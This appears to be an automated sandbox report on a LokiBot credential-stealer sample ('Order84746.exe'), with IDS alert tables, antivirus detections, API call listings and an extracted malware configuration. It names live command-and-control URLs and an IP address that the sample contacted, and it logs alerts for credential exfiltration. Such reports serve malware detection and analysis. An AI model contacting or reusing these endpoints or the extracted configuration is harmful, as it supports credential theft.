2024-11-29T07:38:00.701009+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49764 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:02.367408+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49770 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:04.200296+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49776 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:05.909208+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49782 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:07.785106+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49788 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:12.701337+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49789 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:14.378688+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49805 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:36.587730+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49806 | 94.156.177.41 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T07:37:00.208189+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:02.129463+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:03.780451+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:05.683692+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:07.798758+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:11.363666+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:13.268211+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:15.019342+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:16.845716+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:21.749992+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:23.468794+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:25.297011+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:30.107976+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:32.298014+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:34.000360+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:35.905770+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:37.671798+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:39.516381+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:41.298199+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:43.127928+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:44.826715+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:46.499557+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:48.348566+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:50.256361+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:55.174548+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49760 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:56.938795+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:58.812353+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49764 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:01.082225+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49770 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:02.758235+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49776 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:04.577451+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49782 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:06.307814+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49788 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:08.178167+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49789 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:13.081566+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49805 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:14.764601+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.4 | 49806 | 94.156.177.41 | 80 | TCP
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-11-29T07:37:00.208189+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:02.129463+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:03.780451+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:05.683692+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:07.798758+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:11.363666+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:13.268211+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:15.019342+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:16.845716+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:21.749992+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:23.468794+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:25.297011+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:30.107976+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:32.298014+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:34.000360+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:35.905770+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:37.671798+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:39.516381+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:41.298199+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49754 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:43.127928+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:44.826715+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49756 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:46.499557+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:48.348566+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49758 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:50.256361+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49759 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:55.174548+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49760 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:56.938795+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49763 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:37:58.812353+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49764 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:38:01.082225+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49770 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:38:02.758235+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49776 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:38:04.577451+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49782 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:38:06.307814+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49788 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:38:08.178167+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49789 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:38:13.081566+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49805 | 94.156.177.41 | 80 | TCP
              2024-11-29T07:38:14.764601+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49806 | 94.156.177.41 | 80 | TCP


              AV Detection

              Source: http://94.156.177.41/davinci/five/fre.php | Avira URL Cloud: Label: phishing
              Source: 1.2.svchost.exe.400000.0.unpack | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cb\u00ce\u00d0\u009b\u009e\u0089\u0096\u0091\u009c\u0096\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}
              Source: Order84746.exe | ReversingLabs: Detection: 26%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: Order84746.exe | Joe Sandbox ML: detected
              Source: Order84746.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: wntdll.pdbUGP source: Order84746.exe, 00000000.00000003.1675657454.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Order84746.exe, 00000000.00000003.1675962335.0000000003970000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Order84746.exe, 00000000.00000003.1675657454.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Order84746.exe, 00000000.00000003.1675962335.0000000003970000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2659065134.0000000000FA1000.00000020.00000001.01000000.00000005.sdmp
              Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.2659065134.0000000000FA1000.00000020.00000001.01000000.00000005.sdmp
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_00926CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00926CA9
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009260DD
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009263F9
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0092EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092EB60
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0092F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0092F5FA
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0092F56F FindFirstFileW,FindClose,0_2_0092F56F
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_00931B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00931B2F
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_00931C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00931C8A
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_00931F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00931F94
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

              Networking

              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49730 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49730 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49805 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49805 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49730 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49805 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49789 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49789 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49789 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49805 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49805 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49788 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49788 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49788 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49730 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49750 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49788 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49789 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49789 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49788 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49805
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49770 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49770 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49732 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49732 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49750
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49736 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49748 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49789
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49738 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49770 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 94.156.177.41:80
